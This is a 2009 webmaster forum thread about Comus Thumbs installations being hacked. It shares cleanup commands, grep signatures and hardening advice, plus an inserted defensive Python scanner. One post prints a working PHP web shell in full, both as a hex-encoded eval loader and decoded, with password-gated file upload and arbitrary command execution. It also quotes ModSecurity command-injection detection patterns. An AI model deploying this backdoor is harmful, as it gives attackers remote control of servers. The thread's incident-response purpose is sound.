Secure/Delete your Comus Installation, ALL HTML/PHP Files on Server infected

  • hjnet
    Confirmed User
    • May 2002
    • 3815

    #1

    Secure/Delete your Comus Installation, ALL HTML/PHP Files on Server infected

    Just as a warning for everyone, I had two old copies of comus on a Server with ~20 other Domains. Looks like some hacker managed to break in through comus to load up a script that simply added some malicious Java Script code to EVERY HTML and PHP file on my Server that have been set to 777 file permissions. So some of my Smart Thumbs copies have been affected, and even some of my old static HTML galleries.

    As far as I know there isn't a security update from Comus available by now, so I simply had to delete my two old copies from the Server as it was too risky to keep them there. So if you have Comus on your Box watch it very closely or get rid of the installations.
  • beta-tester
    Rock 'n Roll Baby!
    • Sep 2004
    • 22562

    #2
    How come that I didn't get any of this shit? Maybe my server security is too good?

    Sig for sale. Affordable prices. Contact me and get a great deal ;)

    My contact:
    ICQ: 944-320-46
    e-mail: manca {AT} HotFreeSex4All.com

    Comment

    • hjnet
      Confirmed User
      • May 2002
      • 3815

      #3
      Originally posted by beta-tester
      How come that I didn't get any of this shit? Maybe my server security is too good?
      Yeah, I was thinking the same until yesterday

      Comment

      • asianseekerz
        Confirmed User
        • Aug 2008
        • 1609

        #4
        sometimes it's always on the server side securities if you get hacked!!!
        LUSTY LIFES : Dad & Daughter Wild Adventures : Naughty Wild Sister
        Contact : ICQ : 372109
        Email add: [email protected]

        Comment

        • k0nr4d
          Confirmed User
          • Aug 2006
          • 9231

          #5
          Run a virus scan. Usually this stuff isn't caused by someone hacking your server or exploiting your script, but rather by a virus on your computer that logs in and puts this shit in.
          Mechanical Bunny Media
          Mechbunny Tube Script | Mechbunny Webcam Aggregator Script | Custom Web Development

          Comment

          • qxm
            Confirmed User
            • Jul 2006
            • 5970

            #6
            Just checked one of my old tgps (the only one that still had comus installed)......... yeap.... had to put a 302 htaccess redirect to one of my other sites... every thumb redirect was causing my antivirus to go on full alert...

            ICQ: 266990876

            Comment

            • TheDA
              Confirmed User
              • May 2006
              • 4665

              #7
              There's been a few people hit with this in the past few days
              Sharleen Spiteri - 1989 - In The Ass

              Comment

              • hjnet
                Confirmed User
                • May 2002
                • 3815

                #8
                Originally posted by k0nr4d
                Run a virus scan. Usually this stuff isn't caused by someone hacking your server or exploiting your script, but rather by a virus on your computer that logs in and puts this shit in.
                It's definitely a Comus hack, in my case it was a php script that got executed every ~10 minutes through an external request from an IP in China. I've blocked the IP from my server and it was gone. Many other webmasters are affected too ATM, so this thread should basically be a warning for others to have a close eye on their sites

                Comment

                • hjnet
                  Confirmed User
                  • May 2002
                  • 3815

                  #9
                  Originally posted by qxm
                  Just checked one of my old tgps (the only one that still had comus installed)......... yeap.... had to put a 302 htaccess redirect to one of my other sites... every thumb redirect was causing my antivirus to go on full alert...
                  Yes but check your other HTML and PHP files too on that Server, even if they're on other domains. Take a look at the Java Script code that got inserted in your hacked pages, and search your entire Server for files that might contain that piece of string too

                  i.e. grep -R "function Sym1" * > list_of_infected_files

                  Oh, and at first you might wanna try blocking the IP that calls for the script that puts that malicious Java Script code into your files

                  iptables -A INPUT -s 122.70.145.151 -j DROP

                  Comment

                  • Davy
                    Confirmed User
                    • Apr 2006
                    • 4323

                    #10
                    Originally posted by hjnet
                    Yeah, I was thinking the same until yesterday
                    You guys probably never followed the advice to chmod everything to 777.
                    ---
                    ICQ 14-76-98 <-- I don't use this at all

                    Comment

                    • cykoe6
                      Confirmed User
                      • Apr 2005
                      • 4499

                      #11
                      Fuccckkkkkkkkk this hack got me too. I am deleting my old Comus install now but from what I understand even after you have deleted Comus there are a bunch more backdoors that have likely been installed on the server and have to be rooted out.
                      бабки, шлюхи, сила

                      Comment

                      • Agent 488
                        Registered User
                        • Feb 2006
                        • 22511

                        #12
                        guess that is the final nail in the coffin for comus.

                        wish the best. hacks suck.

                        Comment

                        • SuzzyQ
                          Confirmed User
                          • Dec 2006
                          • 1557

                          #13
                          I am wondering if I delete all the comus installs, have my host load an old backup in and set the files to read only files, will that take care of things?

                          Anybody?

                          Comment

                          • HEAT
                            Confirmed User
                            • Sep 2003
                            • 2255

                            #14
                            How to fix Comus hack.

                            1. Install mod_security. (will stop code injection and defend from web attack.)


                            2. Migrate Comus Thumbs to Smart Thumbs - export and import gals, set cron/templates/trades/secure.php/etc..


                            3. Remove CT completely.


                            4. Find bad phpshell scripts(backdoor) that hacker installed into your server and remove them.

                            grep -R 696620287374 * > /home/backdoor.txt &
                            (will find backdoor scripts under /home and save list to /home/backdoor.txt - normally they are named 'backup.php, sync.php')


                            5. Find infected website files and edit/delete.


                            grep -R svrtsg:#9@#yliwvi:#mlmv@# * > /home/infected.txt &
                            (will find all js code injected files under /home and save list to /home/infected.txt)


                            6. Repeat #4~#5.


                            7. Setup better security.
                            change all server passwords(linux users/mysql users/web logins).
                            install Rootkit Hunter.
                            update APPs via yum(centOS).
                            apache in suexec mode, use suphp, no 777 permission.
                            use SFTP.
                            update mod_security rules.
                            install reliable anti-spyware to your local machine.
                            Last edited by HEAT; 09-21-2009, 06:39 AM.
                            254-282-542

                            Comment

                            • hjnet
                              Confirmed User
                              • May 2002
                              • 3815

                              #15
                              Originally posted by HEAT
                              grep -R 696620287374 * > /home/backdoor.txt &
                              Did you check that the "696620287374" is the same in all backdoor files? Cause I think a "smart" hacker would use randomized files to ensure they're harder to detect


                              Originally posted by HEAT
                              5. Find infected website files and edit/delete.

                              grep -R svrtsg:#9@#yliwvi:#mlmv@# * > /home/infected.txt &
                              For example I had to search for another piece of string to find my infected files, looks like the guy doesn't use the same code strings for his infections all the time





                              P.S. I'd REALLY like to break some kneecaps today

                              Comment

                              • hjnet
                                Confirmed User
                                • May 2002
                                • 3815

                                #16
                                Bump Bump

                                Comment

                                • HEAT
                                  Confirmed User
                                  • Sep 2003
                                  • 2255

                                  #17
                                  Originally posted by hjnet
                                  Did you check that the "696620287374" is the same in all backdoor files? Cause I think a "smart" hacker would use randomized files to ensure they're harder to detect
                                  Yes, all backdoors had the same strings starting with 6966202873 in my case.
                                  Here is the full php code:
                                  echo " ";
                                  $s = "696620287374726C656E28245F504F53545B6363635D293D3 D30297B69662028245F504F53545B706173735D213D2731323 327297B6563686F20273C68746D6C3E3C626F6479206267636 F6C6F723D23424246464242206F6E6C6F61643D22646F63756 D656E742E6D79662E706173732E666F63757328293B223E3C6 66F726D206D6574686F643D504F53543E3C696E707574206E6 16D653D706173733E3C2F666F726D3E3C2F626F64793E3C2F6 8746D6C3E273B6578697428293B7D6563686F20273C68746D6 C3E3C626F6479206267636F6C6F723D23424246464242206F6 E6C6F61643D22646F63756D656E742E6D79662E63632E666F6 3757328293B223E273B6563686F20273C666F726D206E616D6 53D6D7966206D6574686F643D504F535420656E63747970653 D226D756C7469706172742F666F726D2D64617461223E3C696 E70757420747970653D68696464656E206E616D653D7061737 32076616C75653D272E245F504F53545B706173735D2E273E3 C696E70757420747970653D66696C65206E616D653D7570666 96C653E3C696E707574206E616D653D6E65776E616D653E3C6 96E70757420747970653D7375626D69743E3C62723E273B656 3686F20273C696E707574206E616D653D63632073697A653D3 7332076616C75653D22272E7374726970736C6173686573282 45F504F53545B63635D292E27223E3C2F666F726D3E273B656 3686F20273C7072653E273B20696620286D6F76655F75706C6 F616465645F66696C6528245F46494C45535B27757066696C6 5275D5B27746D705F6E616D65275D2C20245F504F53545B6E6 5776E616D655D2929207B202F2A6563686F202253656E742E3 C62723E5C6E223B2A2F207D69662028245F504F53545B6D666 96C655D29207B2020202466703D666F70656E28245F504F535 45B6E65776E616D655D2C277727293B202020666F7228246B3 D303B20246B3C7374726C656E28245F504F53545B6D66696C6 55D293B20246B2B3D322920207B20202020246363203D20737 56273747228245F504F53545B6D66696C655D2C246B2C32293 B20202020246363203D20273078272E2463633B20202020202 02020246363203D20726F756E6428246363293B20202020246 363203D2063687228246363293B20202020667772697465282 466702C246363293B2020207D202066636C6F7365282466702 93B207D24636F3D7374726970736C617368657328245F504F5 3545B63635D293B20246F7574203D2027273B69662866756E6 374696F6E5F6578697374732827657865632729297B6578656 
32824636F2C246F7574293B246F7574203D206A6F696E28225 C6E222C246F7574293B7D656C736569662866756E6374696F6 E5F657869737473282770617373746872752729297B6F625F7 37461727428293B70617373746872752824636F293B246F757 4203D206F625F6765745F636F6E74656E747328293B6F625F6 56E645F636C65616E28293B7D656C736569662866756E63746 96F6E5F657869737473282773797374656D2729297B6F625F7 37461727428293B73797374656D2824636F293B246F7574203 D206F625F6765745F636F6E74656E747328293B6F625F656E6 45F636C65616E28293B7D656C736569662866756E6374696F6 E5F65786973747328277368656C6C5F657865632729297B246 F7574203D207368656C6C5F657865632824636F293B7D656C7 36569662869735F7265736F75726365282466203D20706F706 56E2824636F2C2272222929297B246F7574203D2022223B776 8696C6528214066656F662824662929207B20246F7574202E3 D2066726561642824662C31303234293B7D70636C6F7365282 466293B7D656C7365207B246F75743D276578206661696C656 4273B7D6563686F20246F75743B6563686F20273C2F7072653 E273B6563686F20273C2F626F64793E3C2F68746D6C3E273B7 D20656C7365207B6966286765745F6D616769635F71756F746 5735F6770632829297B6576616C287374726970736C6173686 57328245F504F53545B6363635D29293B7D20656C7365207B6 576616C28245F504F53545B6363635D293B7D7D";
                                  $sss = "";
                                  $k = 0;
                                  for ( ; $k < strlen( $s ); $k += 2 )
                                  {
                                  $ss = chr( "0x".substr( $s, $k, 2 ) + 0 );
                                  $sss .= $ss;
                                  }
                                  eval( $sss );
                                  $ssss = "************************************************* ************************************************** *********************************";
                                  echo "\r\n";
                                  ?>
                                  Code decrypted:
                                  if (strlen($_POST[ccc])==0){if ($_POST[pass]!='123'){echo '<html><body bgcolor=#BBFFBB onload="document.myf.pass.focus();"><form method=POST><input name=pass></form></body></html>';exit();}echo '<html><body bgcolor=#BBFFBB onload="document.myf.cc.focus();">';echo '<form name=myf method=POST enctype="multipart/form-data"><input type=hidden name=pass value='.$_POST[pass].'><input type=file name=upfile><input name=newname><input type=submit><br>';echo '<input name=cc size=73 value="'.stripslashes($_POST[cc]).'"></form>';echo '<pre>'; if (move_uploaded_file($_FILES['upfile']['tmp_name'], $_POST[newname])) { /*echo "Sent.<br>\n";*/ }if ($_POST[mfile]) { $fp=fopen($_POST[newname],'w'); for($k=0; $k<strlen($_POST[mfile]); $k+=2) { $cc = substr($_POST[mfile],$k,2); $cc = '0x'.$cc; $cc = round($cc); $cc = chr($cc); fwrite($fp,$cc); } fclose($fp); }$co=stripslashes($_POST[cc]); $out = '';if(function_exists('exec')){exec($co,$out);$out = join("\n",$out);}elseif(function_exists('passthru' )){ob_start();passthru($co);$out = ob_get_contents();ob_end_clean();}elseif(function_ exists('system')){ob_start();system($co);$out = ob_get_contents();ob_end_clean();}elseif(function_ exists('shell_exec')){$out = shell_exec($co);}elseif(is_resource($f = popen($co,"r"))){$out = "";while(!@feof($f)) { $out .= fread($f,1024);}pclose($f);}else {$out='ex failed';}echo $out;echo '</pre>';echo '</body></html>';} else {if(get_magic_quotes_gpc()){eval(stripslashes($_PO ST[ccc]));} else {eval($_POST[ccc]);}}
                                  I found out it's just another ordinary blind SQL injection attack that has this pattern:

                                  \\b(??:s(?:ys(???:process|tabl)e|filegroup| object)s|c(?:o(?:nstraint|lumn)s|at)|dba|ibm)|ubst r(?:ing)?)|user_(???:constrain|objec)t|tab(?:_ column|le)|ind_column|user)s|password|group)|a(?:t t(?:rel|typ)id|ll_objects)|object_(??:nam|typ)e| id)| ..." at ARGS:ccc.
                                  I don't think this string can't be randomized since it is phpshell and uses 'shell_exec' function.
                                  or if you had installed mod_security, look into /var/log/httpd/modsec_debug.log.

                                  whatever code they have on file, mod_security blocks system calls via web.
                                  you will find a bunch of these logs :
                                  [Sun Sep 20 11:00:33 2009] [error] [client 122.70.145.151] ModSecurity: Access denied with code 501 (phase 2). Pattern match "(?:\\b(??:n(?:et(?:\\b\\W+?\\blocalgroup|\\.e xe )|(?:map|c)\\.exe)|t(?:racer(?:oute|t)|elnet\\.exe |clsh8?|ftp)|(?:w(?:guest|sh)|rcmd|ftp)\\.exe|echo \\b\\W*?\\by+)\\b|c(?:md(??:32)?\\.exe\\b|\\b\\W *?\\/c)|d(?:\\b\\W*?[\\\\/]|\\W*?\\.\\.)|hmod.{0,40}?\\+.{0,3}x))|[\\;\\|\\`]\\W*? ..." at ARGS:ccc. [file "/etc/httpd/modsecurity.d/modsecurity_crs_40_generic_attacks.conf"] [line "133"] [id "950006"] [msg "System Command Injection"] [data ";\\x0a echo"] [severity "CRITICAL"] [tag "WEB_ATTACK/COMMAND_INJECTION"] [hostname "domain.com"] [uri "/vid/86/vgoJ6xWBzS/vgoJ6xWBzS.php"] [unique_id "oF4EtExMEtMAABs4u8sAAAA2"]
                                  so analyze the log file and catch all php files sending system commands. then you can compare all strings.


                                  And for infected web files, yes looks like the backdoors didn't inject the same js code. each code has different encrypted malware url. So classify all html/php files that have 777 permission then abstract those different codes and make your own grep strings for full search.
                                  Luckily, I had only one common string.
                                  Last edited by HEAT; 09-21-2009, 10:28 AM.
                                  254-282-542

                                  Comment

                                  • hjnet
                                    Confirmed User
                                    • May 2002
                                    • 3815

                                    #18
                                    Originally posted by HEAT
                                    Yes, all backdoors had the same strings starting with 6966202873 in my case.
                                    Thanks, I've already found a few backdoor files in the thumbs folder of one of my ST installations. The string to search for is indeed "6966202873" on my backdoor files too

                                    So people search your servers:

                                    grep -R "6966202873" * > list_of_backdoor_files


                                    Oh, and the backdoor files are called "sync.php, thumbs.php and backup.php" in my case, user:group -> nobody:nobody
                                    Last edited by hjnet; 09-22-2009, 09:00 AM.

                                    Comment

                                    • pussyluver
                                      Clueless OleMan
                                      • Mar 2003
                                      • 11009

                                      #19
                                      Anyone hear from Sixzeros or CT on what's up??

                                      Comment

                                      • nico-t
                                        emperor of my world
                                        • Aug 2004
                                        • 29903

                                        #20
                                        how do I prevent this? I've got ct on a test site so it doesn't matter how, it's not yet hacked. What files do I have to change from 777 to something else when I want to prevent it?

                                        Comment

                                        • hjnet
                                          Confirmed User
                                          • May 2002
                                          • 3815

                                          #21
                                          Originally posted by nico-t
                                          how do I prevent this? I've got ct on a test site so it doesn't matter how, it's not yet hacked. What files do I have to change from 777 to something else when I want to prevent it?
                                          I don't know HOW exactly they came in through ComusThumbs, but once in the backdoor file starts to create multiple backdoors in other folders of your Server, no matter which domain, and starts infecting writable files (777 and i.e. 666) with some malicious java script.

                                          So if you REALLY intend to keep your copy of CT you should at least ensure that NO files on your server are writable by the user "nobody", and maybe block the IP I've mentioned earlier in this thread from accessing your Server.

                                          Oh, and search for the strings given in this thread with grep, maybe you're already infected and just didn't recognize it by now....

                                          Comment

                                          • hjnet
                                            Confirmed User
                                            • May 2002
                                            • 3815

                                            #22
                                            Just as a short summary how I got rid of this infection so far

                                            -At first block 122.70.145.151 from accessing your Server, it's an IP in China that triggers the backdoor files on YOUR Server every ~ 10 Minutes to infect writable files

                                            iptables -A INPUT -s 122.70.145.151 -j DROP

                                            And Spudstr from YellowFiber also suggests to block 122.64.0.0/11

                                            iptables -A INPUT -s 122.64.0.0/11 -j DROP


                                            - Then get rid of your Comus installations, I've simply deleted the entire /ct/ folder as I didn't use my installations anyway. That was the only solution for me as long as there's no security patch available


                                            - Next I've scanned my Server for any INFECTED Files

                                            grep -R "function Sym1" * > list_of_infected_files
                                            grep -R "function STy6" * > another_list_of_infected_files

                                            These are the only two different types of insertions I've found so far on my Server, might be possible that there are more out there, please let us know if you come across new ones so everybody could search their Server for the matching string snippets.


                                            - And finally get rid of the backdoor files:

                                            grep -R "6966202873" * > list_of_backdoor_files

                                            The backdoor files on my Server were called something like backup.php, sync.php, thumbs.php


                                            I hope that's it so far, now it's time to tighten Server Security a bit more
                                            Last edited by hjnet; 09-25-2009, 02:22 AM.

                                            Comment
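
Added example, not code from any poster in this thread: a small Python scanner that combines the searches described in posts #17 to #22. It goes beyond the fixed grep strings by decoding any long hex run in a web file and checking the decoded text for PHP execution calls, which covers the case raised in post #15 where the loader string differs between backdoor files. The 200-hex-digit threshold, the list of calls, and all function names are assumptions made for this example; the sample files are constructed and harmless.

```python
import os
import re
import stat
import tempfile

# Strings quoted in the thread: injected-JS function names and the hex prefix
# shared by the backdoor loaders that posters found.
JS_MARKERS = ("function Sym1", "function STy6")
BACKDOOR_PREFIX = "6966202873"

# Assumption (not from the thread): a run of 200+ hex digits inside a web file
# is worth decoding, and these PHP calls in the decoded text mark a loader.
HEX_RUN = re.compile(r"(?:[0-9A-Fa-f]{2}){100,}")
RISKY_CALLS = ("eval(", "passthru(", "system(", "shell_exec(", "popen(",
               "move_uploaded_file(")
SCAN_EXT = (".php", ".html", ".htm")


def hex_payload_calls(text):
    """Decode every long hex run and return the risky calls found inside."""
    found = set()
    for match in HEX_RUN.finditer(text):
        decoded = bytes.fromhex(match.group(0)).decode("latin-1")
        found.update(call for call in RISKY_CALLS if call in decoded)
    return sorted(found)


def inspect_file(path):
    """Return a list of findings for one file (empty list means clean)."""
    info = os.lstat(path)
    if not stat.S_ISREG(info.st_mode):
        return []                      # skip symlinks, sockets, devices
    with open(path, "rb") as handle:
        text = handle.read().decode("latin-1")
    findings = []
    if BACKDOOR_PREFIX in text:
        findings.append("known-backdoor-prefix")
    calls = hex_payload_calls(text)
    if calls:
        findings.append("hex-encoded-code:" + ",".join(calls))
    for marker in JS_MARKERS:
        if marker in text:
            findings.append("injected-js:" + marker)
    if info.st_mode & stat.S_IWOTH:    # the "777 / 666" condition from the thread
        findings.append("world-writable")
    return findings


def scan(root):
    """Walk root and map relative path -> findings for every flagged file."""
    report = {}
    for folder, _dirs, files in os.walk(root):
        for name in files:
            if not name.lower().endswith(SCAN_EXT):
                continue
            path = os.path.join(folder, name)
            findings = inspect_file(path)
            if findings:
                report[os.path.relpath(path, root)] = findings
    return report


def build_demo_tree(root):
    """Write constructed, harmless sample files that mimic the thread's cases."""
    harmless = "/* constructed test payload, harmless */ " * 3 + "eval('1;');"
    samples = {
        # Loader whose hex string does NOT start with the known prefix.
        "thumbs/sync.php": '<?php $s = "%s"; ?>' % harmless.encode().hex().upper(),
        # Page carrying one of the injected-JS marker names.
        "gallery/index.html": "<html><script>function Sym1(a){}</script></html>",
        # Untouched page that is still writable by every local user.
        "gallery/old.html": "<html>static gallery</html>",
        "clean.php": "<?php echo 'ok'; ?>",
    }
    for rel, body in samples.items():
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w") as handle:
            handle.write(body)
        os.chmod(path, 0o666 if rel == "gallery/old.html" else 0o644)


if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as demo_root:
        build_demo_tree(demo_root)
        for rel, findings in sorted(scan(demo_root).items()):
            print(rel, findings)
```

On a real server, call `scan()` on the directory that holds all virtual hosts, since the thread reports files on unrelated domains being modified.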

                                            • Wiredoctor
                                              Confirmed User
                                              • Dec 2001
                                              • 1632

                                              #23
                                              Originally posted by pussyluver
                                              Anyone hear from Sixzeros or CT on what's up??
                                              Are they even still around ??? Do they even care? Do they have a patched Fix available?
                                              Search For Everything In One Easy Portal
                                              Big Juicy Nipples.com

                                              Comment

                                              • nico-t
                                                emperor of my world
                                                • Aug 2004
                                                • 29903

                                                #24
                                                I'm no server expert so I just deleted it all.

                                                Comment

                                                • hjnet
                                                  Confirmed User
                                                  • May 2002
                                                  • 3815

                                                  #25
                                                  Bump Bump

                                                  Comment

                                                  • Naughty-Pages
                                                    Confirmed User
                                                    • Oct 2006
                                                    • 4533

                                                    #26
                                                    add me to the list ...

                                                    fuck.. had noticed a few sites of mine with trojans on it a little over a week ago but was on the road and couldn't do much about it.. (the list is now up to 14 sites that have had code added to them)..

                                                    narrowed it down to assuming it was the one site that i use Comus on as being the source of the problems and then searched GFY for Comus to confirm others were having an issue... and here we are...

                                                    looks like i'll be killing it as Comus has no update, and going to their site to redownload a fresh copy to make sure i had the latest version just gives an error...

                                                    on this one server i probably have 200-300 sites.. i'm sure that there's more than 14 infected.. looks like i am going to have dun today..

                                                    Comment

                                                    • wizzart
                                                      scriptmaster
                                                      • May 2006
                                                      • 5246

                                                      #27
                                                      good info thanks
                                                      BimboZone

                                                      Comment

                                                      • Carmine Raguso
                                                        So Fucking Banned
                                                        • Dec 2008
                                                        • 2158

                                                        #28
                                                        Originally posted by wizzart
                                                        good info thanks
                                                        This is old news man. Get with the program. Stop bumping old shit.

                                                        Comment

                                                        • Fletch XXX
                                                          GFY HALL OF FAME DAMMIT!!!
                                                          • Jan 2002
                                                          • 60840

                                                          #29
                                                          Originally posted by nico-t
                                                          I'm no server expert so I just deleted it all.
                                                          same. had it sitting on a site, and just hit delete on the CT dir.

                                                          lol

                                                          Want an Android App for your tube, membership, or free site?

                                                          Need banners or promo material? Hit us up (ICQ Fletch: 148841377) or email me fletchxxx at gmail.com - recent work - About me

                                                          Comment

                                                          • Naughty-Pages
                                                            Confirmed User
                                                            • Oct 2006
                                                            • 4533

                                                            #30
                                                            Originally posted by Carmine Raguso
                                                            This is old news man. Get with the program. Stop bumping old shit.
                                                            Umm.. actually smart ass, this is a different/new issue.. and this thread is not old.. this is a current problem...

                                                            Looking through your post history, it's apparent you are a troll.. and your posts have nothing of value whatsoever.. Looking through the past couple weeks of your posts I can only assume you are not even a webmaster.. just really dumb shit..


                                                            more info is here:
                                                            http://www.gofuckyourself.com/showthread.php?t=931492


                                                            please ignore the troll with the avatar of his boyfriend..
                                                            Last edited by Naughty-Pages; 10-04-2009, 04:09 PM.

                                                            Comment

                                                            • pornpf69
                                                              Too lazy to set a custom title
                                                              • Jun 2004
                                                              • 15782

                                                              #31
                                                              I had the same issue... and got about 20 or 30 sites hacked because of CT... I have removed all CT's I had... and redirected those domains to some CAM sites...

                                                              Comment

                                                              • Naughty-Pages
                                                                Confirmed User
                                                                • Oct 2006
                                                                • 4533

                                                                #32
                                                                Originally posted by Carmine Raguso
                                                                This is old news man. Get with the program. Stop bumping old shit.


                                                                We interrupt this thread for a public GFY announcement:
                                                                Carmine Raguso is the OFFICIAL WINNER of the GFY Troll of the Week award!!!
                                                                yup.. he won..

                                                                Last edited by Naughty-Pages; 10-04-2009, 07:05 PM.

                                                                Comment

                                                                • Dennis69
                                                                  Confirmed User
                                                                  • Feb 2003
                                                                  • 1685

                                                                  #33
                                                                  Originally posted by hjnet
                                                                  Just as a short summary how I got rid of this infection so far

                                                                  -At first block 122.70.145.151 from accessing your Server, it's an IP in China that triggers the backdoor files on YOUR Server every ~ 10 Minutes to infect writable files

                                                                  iptables -A INPUT -s 122.70.145.151 -j DROP

                                                                  And Spudstr from YellowFiber also suggests to block 122.64.0.0/11

                                                                  iptables -A INPUT -s 122.64.0.0/11 -j DROP


                                                                  - Then get rid of your Comus installations, I've simply deleted the entire /ct/ folder as I didn't use my installations anyway. That was the only solution for me as long as there's no security patch available


                                                                  - Next I've scanned my Server for any INFECTED Files

                                                                  grep -R "function Sym1" * > list_of_infected_files
                                                                  grep -R "function STy6" * > another_list_of_infected_files

                                                                  These are the only two different types of insertions I've found so far on my Server, might be possible that there are more out there, please let us know if you come across new ones so everybody could search their Server for the matching string snippets.


                                                                  - And finally get rid of the backdoor files:

                                                                  grep -R "6966202873" * > list_of_backdoor_files

                                                                  The backdoor files on my Server were called something like backup.php, sync.php, thumbs.php


                                                                  I hope that's it so far, now it's time to tighten Server Security a bit more

                                                                  Is this all done through SSH?
                                                                  HaHaHa

                                                                  Comment
